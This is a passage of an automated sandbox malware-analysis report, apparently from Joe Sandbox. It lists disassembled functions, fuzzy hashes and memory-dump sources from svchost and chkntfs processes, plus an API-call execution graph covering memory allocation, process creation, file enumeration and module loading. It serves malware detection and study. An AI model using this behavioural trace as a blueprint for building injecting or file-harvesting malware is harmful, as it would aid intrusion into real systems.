                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: %%%u$[$]:%u
                                                                      • API String ID: 48624451-2819853543
                                                                      • Opcode ID: 378035b84d1cdac5bb56355708fb774f17c59a10302212110147fc4e22cbd17e
                                                                      • Instruction ID: 1a6ad7516f36d1b4ae05f592742d9565a72ff6155f90bbe2fb544777c2111ac8
                                                                      • Opcode Fuzzy Hash: 378035b84d1cdac5bb56355708fb774f17c59a10302212110147fc4e22cbd17e
                                                                      • Instruction Fuzzy Hash: BC21957AA20319EBCB10EF79CC41AEEBBFCEF44640F480516E905E7201E770DA418BA1
                                                                      Function 0325F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • RTL: Re-Waiting, xrefs: 032A031E
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032A02E7
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032A02BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                      • API String ID: 0-2474120054
                                                                      • Opcode ID: 0770ced0a8543f188d65096712d2bfc3eda5775874fcc5ab36c9d862c537c220
                                                                      • Instruction ID: be7f0e556b13158cc69630657756a1ccfef2e696e369f2ded72237e1c17dbd98
                                                                      • Opcode Fuzzy Hash: 0770ced0a8543f188d65096712d2bfc3eda5775874fcc5ab36c9d862c537c220
                                                                      • Instruction Fuzzy Hash: 6EE1B230624742EFD725CF28C984B2AB7E4BF84714F184A5DF9A58B2D1D7B4DA84CB42
                                                                      Function 0326BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • RTL: Resource at %p, xrefs: 032A7B8E
                                                                      • RTL: Re-Waiting, xrefs: 032A7BAC
                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 032A7B7F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                      • API String ID: 0-871070163
                                                                      • Opcode ID: 93c8382d003a1af5c420777872f38e1e2e95cb7b159291926bb5e2ecbe6792d6
                                                                      • Instruction ID: 3437a982b7288415a937c33a05f122bfdd8225231925c00d989783ed3016b93e
                                                                      • Opcode Fuzzy Hash: 93c8382d003a1af5c420777872f38e1e2e95cb7b159291926bb5e2ecbe6792d6
                                                                      • Instruction Fuzzy Hash: 3841E1353207029FC724DE6ACD40B6AB7E9EF88710F140A2DF95ADB690DB71E4C58B91
                                                                      Function 0326B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 032A728C
                                                                      Strings
                                                                      • RTL: Resource at %p, xrefs: 032A72A3
                                                                      • RTL: Re-Waiting, xrefs: 032A72C1
                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 032A7294
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                      • API String ID: 885266447-605551621
                                                                      • Opcode ID: 1b454e623a544f7b30e6fde3a50d3c081a99c8f9073638d8b7a40812b3d1ac0f
                                                                      • Instruction ID: b4ef0d45abcb9dd8cf0750245503b0f4995caaab8f432e0e18494ef398bed3f0
                                                                      • Opcode Fuzzy Hash: 1b454e623a544f7b30e6fde3a50d3c081a99c8f9073638d8b7a40812b3d1ac0f
                                                                      • Instruction Fuzzy Hash: 6E41FF35720B06ABC720DE69CC41B6AB7A5FF84710F140629F995EB280DB71E8D28BD5
                                                                      Function 032E2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: %%%u$]:%u
                                                                      • API String ID: 48624451-3050659472
                                                                      • Opcode ID: 18836de5fd87b1ec9623136bd4798d2e3744f7d1c428deaa92cd06dc0edef5be
                                                                      • Instruction ID: 34bf7510d0e48d27dd44ab201ab035bfc87b1377ae5cc344b44fc9514cb727d0
                                                                      • Opcode Fuzzy Hash: 18836de5fd87b1ec9623136bd4798d2e3744f7d1c428deaa92cd06dc0edef5be
                                                                      • Instruction Fuzzy Hash: D4316876A10319DFDB20EF29DC41BEEB7BCFB44610F844556E849E7240EB709A848F61
                                                                      Function 03277D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldvrm
                                                                      • String ID: +$-
                                                                      • API String ID: 1302938615-2137968064
                                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                      • Instruction ID: c87f3187002f12933c02a48904b7cdd74a32ebf3003ddae543596ad2d33be7ff
                                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                      • Instruction Fuzzy Hash: F991C371E202179BDF24DF6DC981ABEB7A5FF45320F18452AE865E72C0D77089C18B51
                                                                      Function 03239126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$@
                                                                      • API String ID: 0-1194432280
                                                                      • Opcode ID: 572d6aac54eae635856ab768d2069edf3a0ce3ce03660b4df34713a05be4aa76
                                                                      • Instruction ID: d485000cf386a483e8a260abf34842b9dc4d37675d8b88fa4411bc92416875d2
                                                                      • Opcode Fuzzy Hash: 572d6aac54eae635856ab768d2069edf3a0ce3ce03660b4df34713a05be4aa76
                                                                      • Instruction Fuzzy Hash: 678108B6D10269DBDB25DF54CC44BEEB6B8AF09710F0445EAA919B7280D7709EC4CFA0
                                                                      Function 032BCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 032BCFBD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CallFilterFunc@8
                                                                      • String ID: @$@4Cw@4Cw
                                                                      • API String ID: 4062629308-3101775584
                                                                      • Opcode ID: 80d3acf8d3877f2a1df0f3fc2081534e3baba8778b8b3cbdfc6460daa3919efb
                                                                      • Instruction ID: fad3bb92f11810c9d917850b44c34b7d3afceb3593eb79abecc94ceaae6cce8e
                                                                      • Opcode Fuzzy Hash: 80d3acf8d3877f2a1df0f3fc2081534e3baba8778b8b3cbdfc6460daa3919efb
                                                                      • Instruction Fuzzy Hash: B141D079A20324DFCB21DFA9C880AADBBB8FF45750F04446AE914DB255D7B4D881CB60

                                                                      Execution Graph

                                                                      Execution Coverage:2.5%
                                                                      Dynamic/Decrypted Code Coverage:4.4%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:434
                                                                      Total number of Limit Nodes:71
                                                                      execution_graph 100282 249178b 100283 249179f 100282->100283 100284 2491793 PostThreadMessageW 100282->100284 100284->100283 100285 2492c40 100286 2492c5c 100285->100286 100291 24a94d0 100286->100291 100290 2492c8b 100292 24a94ea 100291->100292 100300 44c2c0a 100292->100300 100293 2492c76 100295 24a9f10 100293->100295 100296 24a9f3e 100295->100296 100297 24a9fa2 100295->100297 100296->100290 100303 44c2e80 LdrInitializeThunk 100297->100303 100298 24a9fd3 100298->100290 100301 44c2c1f LdrInitializeThunk 100300->100301 100302 44c2c11 100300->100302 100301->100293 100302->100293 100303->100298 100304 24a6a40 100305 24a6a9a 100304->100305 100307 24a6aa7 100305->100307 100308 24a4460 100305->100308 100315 24abe70 100308->100315 100310 24a44a1 100313 24a45ae 100310->100313 100318 2494f00 100310->100318 100312 24a4530 Sleep 100314 24a44e7 100312->100314 100313->100307 100314->100312 100314->100313 100322 24a9fe0 100315->100322 100317 24abea1 100317->100310 100319 2494f24 100318->100319 100320 2494f2b 100319->100320 100321 2494f72 LdrLoadDll 100319->100321 100320->100314 100321->100320 100323 24aa075 100322->100323 100325 24aa00b 100322->100325 100324 24aa08b NtAllocateVirtualMemory 100323->100324 100324->100317 100325->100317 100326 24a0200 100327 24a0264 100326->100327 100355 2496c60 100327->100355 100329 24a039e 100330 24a0397 100330->100329 100362 2496d70 100330->100362 100332 24a0543 100333 24a041a 100333->100332 100334 24a0552 100333->100334 100366 249ffe0 100333->100366 100335 24a9e80 NtClose 100334->100335 100338 24a055c 100335->100338 100337 24a0456 100337->100334 100339 24a0461 100337->100339 100375 24abfe0 100339->100375 100341 24a048a 100342 24a04a9 100341->100342 100343 24a0493 100341->100343 100378 249fed0 CoInitialize 100342->100378 100344 24a9e80 NtClose 100343->100344 100346 24a049d 100344->100346 100347 24a04b7 100381 24a9950 100347->100381 100349 24a0532 100385 24a9e80 100349->100385 100351 24a053c 100388 24abf00 100351->100388 100353 24a04d5 100353->100349 100354 24a9950 LdrInitializeThunk 100353->100354 100354->100353 100356 2496c93 100355->100356 100357 2496cb7 100356->100357 100391 24a99f0 100356->100391 100357->100330 100359 2496cda 100359->100357 100360 24a9e80 NtClose 100359->100360 100361 2496d5c 100360->100361 100361->100330 100363 2496d95 100362->100363 100396 24a97e0 100363->100396 100367 249fffc 100366->100367 100368 2494f00 LdrLoadDll 100367->100368 100370 24a001a 100368->100370 100369 24a0023 100369->100337 100370->100369 100371 2494f00 LdrLoadDll 100370->100371 100372 24a00ee 100371->100372 100373 2494f00 LdrLoadDll 100372->100373 100374 24a014b 100372->100374 100373->100374 100374->100337 100401 24aa1a0 100375->100401 100377 24abffb 100377->100341 100380 249ff35 100378->100380 100379 249ffcb CoUninitialize 100379->100347 100380->100379 100382 24a996a 100381->100382 100404 44c2ba0 LdrInitializeThunk 100382->100404 100383 24a999a 100383->100353 100386 24a9e9d 100385->100386 100387 24a9eae NtClose 100386->100387 100387->100351 100405 24aa1f0 100388->100405 100390 24abf19 100390->100332 100392 24a9a0d 100391->100392 100395 44c2ca0 LdrInitializeThunk 100392->100395 100393 24a9a39 100393->100359 100395->100393 100397 24a97fa 100396->100397 100400 44c2c60 LdrInitializeThunk 100397->100400 100398 2496e09 100398->100333 100400->100398 100402 24aa1bd 100401->100402 100403 24aa1ce RtlAllocateHeap 100402->100403 100403->100377 100404->100383 100406 24aa20d 100405->100406 100407 24aa21e RtlFreeHeap 100406->100407 100407->100390 100408 24ad000 100409 24abf00 RtlFreeHeap 100408->100409 100410 24ad015 100409->100410 100411 24a9b80 100412 24a9c3a 100411->100412 100414 24a9bb2 100411->100414 100413 24a9c50 NtCreateFile 100412->100413 100415 24a9480 100416 24a949a 100415->100416 100419 44c2df0 LdrInitializeThunk 100416->100419 100417 24a94c2 100419->100417 100420 24a0b00 100421 24a0b23 100420->100421 100422 2494f00 LdrLoadDll 100421->100422 100423 24a0b47 100422->100423 100424 24a9300 100425 24a9392 100424->100425 100427 24a932e 100424->100427 100429 44c2ee0 LdrInitializeThunk 100425->100429 100426 24a93c3 100429->100426 100430 2493118 100431 2493138 100430->100431 100432 2496c60 2 API calls 100431->100432 100433 2493143 100432->100433 100434 2489f50 100436 2489f5f 100434->100436 100435 2489fa0 100436->100435 100437 2489f8d CreateThread 100436->100437 100438 2497ad0 100439 2497aec 100438->100439 100447 2497b3f 100438->100447 100441 24a9e80 NtClose 100439->100441 100439->100447 100440 2497c77 100442 2497b07 100441->100442 100448 2496ef0 NtClose LdrInitializeThunk LdrInitializeThunk 100442->100448 100444 2497c51 100444->100440 100450 24970c0 NtClose LdrInitializeThunk LdrInitializeThunk 100444->100450 100447->100440 100449 2496ef0 NtClose LdrInitializeThunk LdrInitializeThunk 100447->100449 100448->100447 100449->100444 100450->100440 100461 24a2150 100462 24a216c 100461->100462 100463 24a21a8 100462->100463 100464 24a2194 100462->100464 100466 24a9e80 NtClose 100463->100466 100465 24a9e80 NtClose 100464->100465 100467 24a219d 100465->100467 100468 24a21b1 100466->100468 100471 24ac020 RtlAllocateHeap 100468->100471 100470 24a21bc 100471->100470 100472 44c2ad0 LdrInitializeThunk 100473 2493aac 100478 2498710 100473->100478 100476 24a9e80 NtClose 100477 2493ad8 100476->100477 100479 2493abc 100478->100479 100480 249872a 100478->100480 100479->100476 100479->100477 100484 24a9570 100480->100484 100483 24a9e80 NtClose 100483->100479 100485 24a958a 100484->100485 100488 44c35c0 LdrInitializeThunk 100485->100488 100486 24987fa 100486->100483 100488->100486 100489 2496560 100490 2496590 100489->100490 100494 2498a90 100489->100494 100493 24965bc 100490->100493 100498 2498a10 100490->100498 100495 2498aa3 100494->100495 100505 24a93d0 100495->100505 100497 2498ace 100497->100490 100499 2498a54 100498->100499 100500 2498a75 100499->100500 100511 24a91a0 100499->100511 100500->100490 100502 2498a65 100503 2498a81 100502->100503 100504 24a9e80 NtClose 100502->100504 100503->100490 100504->100500 100506 24a9451 100505->100506 100508 24a93fe 100505->100508 100510 44c2dd0 LdrInitializeThunk 100506->100510 100507 24a9476 100507->100497 100508->100497 100510->100507 100512 24a9220 100511->100512 100513 24a91ce 100511->100513 100516 44c4650 LdrInitializeThunk 100512->100516 100513->100502 100514 24a9245 100514->100502 100516->100514 100517 249cfa0 100519 249cfc9 100517->100519 100518 249d0cd 100519->100518 100520 249d073 FindFirstFileW 100519->100520 100520->100518 100522 249d08e 100520->100522 100521 249d0b4 FindNextFileW 100521->100522 100523 249d0c6 FindClose 100521->100523 100522->100521 100523->100518 100524 24a24e0 100528 24a24f9 100524->100528 100525 24a2544 100526 24abf00 RtlFreeHeap 100525->100526 100527 24a2554 100526->100527 100528->100525 100529 24a2584 100528->100529 100531 24a2589 100528->100531 100530 24abf00 RtlFreeHeap 100529->100530 100530->100531 100532 24a9de0 100533 24a9e57 100532->100533 100535 24a9e0b 100532->100535 100534 24a9e6d NtDeleteFile 100533->100534 100543 248bdf0 100544 248d461 100543->100544 100545 24abe70 NtAllocateVirtualMemory 100543->100545 100545->100544 100546 2489fb0 100547 248a442 100546->100547 100549 248a9a4 100547->100549 100550 24abb60 100547->100550 100551 24abb86 100550->100551 100556 24841a0 100551->100556 100553 24abb92 100555 24abbcb 100553->100555 100559 24a5fd0 100553->100559 100555->100549 100558 24841ad 100556->100558 100563 2493bb0 100556->100563 100558->100553 100560 24a6032 100559->100560 100562 24a603f 100560->100562 100574 2492360 100560->100574 100562->100555 100564 2493bcd 100563->100564 100566 2493be6 100564->100566 100567 24aa8d0 100564->100567 100566->100558 100569 24aa8ea 100567->100569 100568 24aa919 100568->100566 100569->100568 100570 24a94d0 LdrInitializeThunk 100569->100570 100571 24aa976 100570->100571 100572 24abf00 RtlFreeHeap 100571->100572 100573 24aa98f 100572->100573 100573->100566 100575 249239b 100574->100575 100590 2498820 100575->100590 100577 24923a3 100578 2492686 100577->100578 100579 24abfe0 RtlAllocateHeap 100577->100579 100578->100562 100580 24923b9 100579->100580 100581 24abfe0 RtlAllocateHeap 100580->100581 100582 24923ca 100581->100582 100583 24abfe0 RtlAllocateHeap 100582->100583 100584 24923db 100583->100584 100589 2492478 100584->100589 100605 24973c0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100584->100605 100586 2494f00 LdrLoadDll 100587 2492632 100586->100587 100601 24a8910 100587->100601 100589->100586 100591 249884c 100590->100591 100592 2498710 2 API calls 100591->100592 100593 249886f 100592->100593 100594 2498879 100593->100594 100595 2498891 100593->100595 100596 2498884 100594->100596 100598 24a9e80 NtClose 100594->100598 100597 24988ad 100595->100597 100599 24a9e80 NtClose 100595->100599 100596->100577 100597->100577 100598->100596 100600 24988a3 100599->100600 100600->100577 100602 24a8972 100601->100602 100604 24a897f 100602->100604 100606 24926a0 100602->100606 100604->100578 100605->100589 100609 24926c0 100606->100609 100622 2498af0 100606->100622 100608 2492c26 100608->100604 100609->100608 100626 24a1b20 100609->100626 100612 24928da 100634 24ad0d0 100612->100634 100613 249271e 100613->100608 100629 24acfa0 100613->100629 100615 2498a90 LdrInitializeThunk 100616 249293f 100615->100616 100616->100608 100616->100615 100619 24911b0 LdrInitializeThunk 100616->100619 100617 24928ef 100617->100616 100640 24911b0 100617->100640 100619->100616 100620 2498a90 LdrInitializeThunk 100621 2492a93 100620->100621 100621->100616 100621->100620 100623 2498afd 100622->100623 100624 2498b1e SetErrorMode 100623->100624 100625 2498b25 100623->100625 100624->100625 100625->100609 100627 24abe70 NtAllocateVirtualMemory 100626->100627 100628 24a1b41 100627->100628 100628->100613 100630 24acfb0 100629->100630 100631 24acfb6 100629->100631 100630->100612 100632 24abfe0 RtlAllocateHeap 100631->100632 100633 24acfdc 100632->100633 100633->100612 100635 24ad040 100634->100635 100636 24ad09d 100635->100636 100637 24abfe0 RtlAllocateHeap 100635->100637 100636->100617 100638 24ad07a 100637->100638 100639 24abf00 RtlFreeHeap 100638->100639 100639->100636 100641 24911d2 100640->100641 100643 24aa100 100640->100643 100641->100621 100644 24aa11a 100643->100644 100647 44c2c70 LdrInitializeThunk 100644->100647 100645 24aa142 100645->100641 100647->100645 100648 249b6f0 100653 249b400 100648->100653 100650 249b6fd 100667 249b070 100650->100667 100652 249b719 100654 249b425 100653->100654 100678 2498d00 100654->100678 100657 249b573 100657->100650 100659 249b58a 100659->100650 100660 249b581 100660->100659 100662 249b677 100660->100662 100697 249aac0 100660->100697 100663 249b6da 100662->100663 100706 249ae30 100662->100706 100665 24abf00 RtlFreeHeap 100663->100665 100666 249b6e1 100665->100666 100666->100650 100668 249b086 100667->100668 100671 249b091 100667->100671 100669 24abfe0 RtlAllocateHeap 100668->100669 100669->100671 100670 249b0b8 100670->100652 100671->100670 100672 2498d00 GetFileAttributesW 100671->100672 100673 249b3d2 100671->100673 100676 249aac0 RtlFreeHeap 100671->100676 100677 249ae30 RtlFreeHeap 100671->100677 100672->100671 100674 249b3eb 100673->100674 100675 24abf00 RtlFreeHeap 100673->100675 100674->100652 100675->100674 100676->100671 100677->100671 100679 2498d21 100678->100679 100680 2498d28 GetFileAttributesW 100679->100680 100681 2498d33 100679->100681 100680->100681 100681->100657 100682 24a3d30 100681->100682 100683 24a3d3e 100682->100683 100684 24a3d45 100682->100684 100683->100660 100685 2494f00 LdrLoadDll 100684->100685 100686 24a3d7a 100685->100686 100687 24a3d89 100686->100687 100710 24a37f0 LdrLoadDll 100686->100710 100689 24abfe0 RtlAllocateHeap 100687->100689 100693 24a3f37 100687->100693 100690 24a3da2 100689->100690 100691 24a3f2d 100690->100691 100690->100693 100695 24a3dbe 100690->100695 100692 24abf00 RtlFreeHeap 100691->100692 100691->100693 100692->100693 100693->100660 100694 24abf00 RtlFreeHeap 100696 24a3f21 100694->100696 100695->100693 100695->100694 100696->100660 100698 249aae6 100697->100698 100711 249e510 100698->100711 100700 249ab5b 100701 249ace0 100700->100701 100703 249ab79 100700->100703 100702 249acc5 100701->100702 100704 249a980 RtlFreeHeap 100701->100704 100702->100660 100703->100702 100716 249a980 100703->100716 100704->100701 100707 249ae56 100706->100707 100708 249e510 RtlFreeHeap 100707->100708 100709 249aedd 100708->100709 100709->100662 100710->100687 100713 249e534 100711->100713 100712 249e541 100712->100700 100713->100712 100714 24abf00 RtlFreeHeap 100713->100714 100715 249e584 100714->100715 100715->100700 100717 249a99d 100716->100717 100720 249e5a0 100717->100720 100719 249aaa3 100719->100703 100721 249e5c4 100720->100721 100722 249e66e 100721->100722 100723 24abf00 RtlFreeHeap 100721->100723 100722->100719 100723->100722 100724 2497cb0 100725 2497cc8 100724->100725 100727 2497d22 100724->100727 100725->100727 100728 249bc20 100725->100728 100729 249bc46 100728->100729 100730 249be79 100729->100730 100755 24aa280 100729->100755 100730->100727 100732 249bcbc 100732->100730 100733 24ad0d0 2 API calls 100732->100733 100734 249bcdb 100733->100734 100734->100730 100735 249bdb2 100734->100735 100736 24a94d0 LdrInitializeThunk 100734->100736 100737 24964e0 LdrInitializeThunk 100735->100737 100739 249bdd1 100735->100739 100738 249bd3d 100736->100738 100737->100739 100738->100735 100741 249bd46 100738->100741 100754 249be61 100739->100754 100761 24a9040 100739->100761 100740 249bd9a 100743 2498a90 LdrInitializeThunk 100740->100743 100741->100730 100741->100740 100742 249bd78 100741->100742 100758 24964e0 100741->100758 100776 24a5160 LdrInitializeThunk 100742->100776 100747 249bda8 100743->100747 100747->100727 100748 2498a90 LdrInitializeThunk 100749 249be6f 100748->100749 100749->100727 100750 249be38 100766 24a90f0 100750->100766 100752 249be52 100771 24a9250 100752->100771 100754->100748 100756 24aa29a 100755->100756 100757 24aa2ab CreateProcessInternalW 100756->100757 100757->100732 100760 249651e 100758->100760 100777 24a96a0 100758->100777 100760->100742 100762 24a90bd 100761->100762 100764 24a906b 100761->100764 100783 44c39b0 LdrInitializeThunk 100762->100783 100763 24a90e2 100763->100750 100764->100750 100767 24a916d 100766->100767 100768 24a911b 100766->100768 100784 44c4340 LdrInitializeThunk 100767->100784 100768->100752 100769 24a9192 100769->100752 100772 24a92cd 100771->100772 100774 24a927b 100771->100774 100785 44c2fb0 LdrInitializeThunk 100772->100785 100773 24a92f2 100773->100754 100774->100754 100776->100740 100778 24a9751 100777->100778 100780 24a96cf 100777->100780 100782 44c2d10 LdrInitializeThunk 100778->100782 100779 24a9796 100779->100760 100780->100760 100782->100779 100783->100763 100784->100769 100785->100773 100786 2497730 100787 249775a 100786->100787 100790 24988c0 100787->100790 100789 2497784 100791 24988dd 100790->100791 100797 24a95c0 100791->100797 100793 249892d 100794 2498934 100793->100794 100795 24a96a0 LdrInitializeThunk 100793->100795 100794->100789 100796 249895d 100795->100796 100796->100789 100798 24a965b 100797->100798 100800 24a95eb 100797->100800 100802 44c2f30 LdrInitializeThunk 100798->100802 100799 24a9694 100799->100793 100800->100793 100802->100799 100803 249a5b0 100805 249a5bf 100803->100805 100804 249a5c6 100805->100804 100806 24abf00 RtlFreeHeap 100805->100806 100806->100804 100807 24a9cf0 100808 24a9d97 100807->100808 100810 24a9d1b 100807->100810 100809 24a9dad NtReadFile 100808->100809 100812 24991b7 100813 24991ba 100812->100813 100814 2499171 100813->100814 100816 2497a50 100813->100816 100817 2497a66 100816->100817 100819 2497a9f 100816->100819 100817->100819 100820 24978c0 LdrLoadDll 100817->100820 100819->100814 100820->100819

                                                                      Executed Functions

                                                                      Function 02489FB0 Relevance: 43.0, Strings: 34, Instructions: 523COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 27 2489fb0-248a440 28 248a451-248a45d 27->28 29 248a45f-248a468 28->29 30 248a475-248a47f 28->30 31 248a46a-248a470 29->31 32 248a473 29->32 33 248a490-248a49c 30->33 31->32 32->28 35 248a49e-248a4b0 33->35 36 248a4b2 33->36 35->33 37 248a4b9-248a4d2 36->37 37->37 39 248a4d4-248a4de 37->39 40 248a4ef-248a4fb 39->40 41 248a4fd-248a505 40->41 42 248a521-248a52b 40->42 43 248a50c-248a50e 41->43 44 248a507-248a50b 41->44 45 248a53c-248a545 42->45 48 248a51f 43->48 49 248a510-248a519 43->49 44->43 46 248a56a-248a571 45->46 47 248a547-248a557 45->47 52 248a5a3-248a5ad 46->52 53 248a573-248a5a1 46->53 50 248a568 47->50 51 248a559-248a562 47->51 48->40 49->48 50->45 51->50 56 248a5be-248a5ca 52->56 53->46 57 248a5e8-248a5ef 56->57 58 248a5cc-248a5d8 56->58 61 248a5f1-248a607 57->61 62 248a614-248a61e 57->62 59 248a5da-248a5e0 58->59 60 248a5e6 58->60 59->60 60->56 65 248a609-248a60f 61->65 66 248a612 61->66 63 248a62f-248a63b 62->63 67 248a64b-248a65c 63->67 68 248a63d-248a649 63->68 65->66 66->57 69 248a66d-248a679 67->69 68->63 71 248a68a 69->71 72 248a67b-248a688 69->72 73 248a691-248a69a 71->73 72->69 75 248a8ea-248a8f4 73->75 76 248a6a0-248a6aa 73->76 78 248a905-248a911 75->78 77 248a6bb-248a6c4 76->77 79 248a6da-248a6dd 77->79 80 248a6c6-248a6d8 77->80 81 248a913-248a922 78->81 82 248a924-248a92e 78->82 85 248a6e3-248a6e7 79->85 80->77 81->78 83 248a93f-248a94b 82->83 89 248a94d-248a95f 83->89 90 248a961-248a968 83->90 87 248a6e9-248a6f2 85->87 88 248a715-248a71f 85->88 91 248a6f9-248a713 87->91 92 248a6f4-248a6f8 87->92 95 248a730-248a73c 88->95 89->83 93 248a96e-248a97a 90->93 94 248aa40-248aa4a 90->94 91->85 92->91 98 248a97c-248a99d 93->98 99 248a99f call 24abb60 93->99 97 248aa5b-248aa65 94->97 100 248a74d-248a75c 95->100 101 248a73e-248a74b 95->101 102 248aab9-248aac3 97->102 103 248aa67-248aab7 97->103 98->93 110 248a9a4-248a9ad 99->110 106 248a8a1-248a8ab 100->106 107 248a762-248a769 100->107 101->95 109 248aad4-248aade 102->109 103->97 113 248a8bc-248a8c5 106->113 111 248a78a-248a794 107->111 112 248a76b-248a788 107->112 114 248aae0-248ab30 109->114 115 248ab32-248ab3b 109->115 117 248a9af-248a9d0 110->117 118 248a9d2-248a9dc 110->118 116 248a7a5-248a7b1 111->116 112->107 119 248a8db-248a8e5 113->119 120 248a8c7-248a8d9 113->120 114->109 123 248a7b3-248a7c5 116->123 124 248a7c7-248a7d1 116->124 117->110 125 248a9ed-248a9f9 118->125 119->73 120->113 123->116 126 248a7e2-248a7ec 124->126 128 248a9fb-248aa0d 125->128 129 248aa0f-248aa1b 125->129 130 248a7ee-248a81e 126->130 131 248a820-248a82a 126->131 128->125 129->94 132 248aa1d-248aa3e 129->132 130->126 134 248a83b-248a845 131->134 132->129 136 248a89f 134->136 137 248a847-248a89d 134->137 136->75 137->134
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !!$$$$4$%-$%0$(:$*$,$2;$4'$7$@]$@f$B$D$G$H$Jd$M<$M<$QD$_$_$c$cb$h$k$m1$s$w!$x$2$P$]
                                                                      • API String ID: 0-2774095859
                                                                      • Opcode ID: b89a179c66ba4be99a4adbec441b912c6e81bdf256819916907173be9fe26a28
                                                                      • Instruction ID: 5797f046d38590b60941ea8190330f53ef4bde99d50e81c7667973fa9600ddce
                                                                      • Opcode Fuzzy Hash: b89a179c66ba4be99a4adbec441b912c6e81bdf256819916907173be9fe26a28
                                                                      • Instruction Fuzzy Hash: 816288B0D15669CBEB24DF44C998BDDBBB2BB84309F1081DAC4096B385D7B95AC9CF40
                                                                      Function 0249CFA0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 0249D084
                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 0249D0BF
                                                                      • FindClose.KERNELBASE(?), ref: 0249D0CA
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
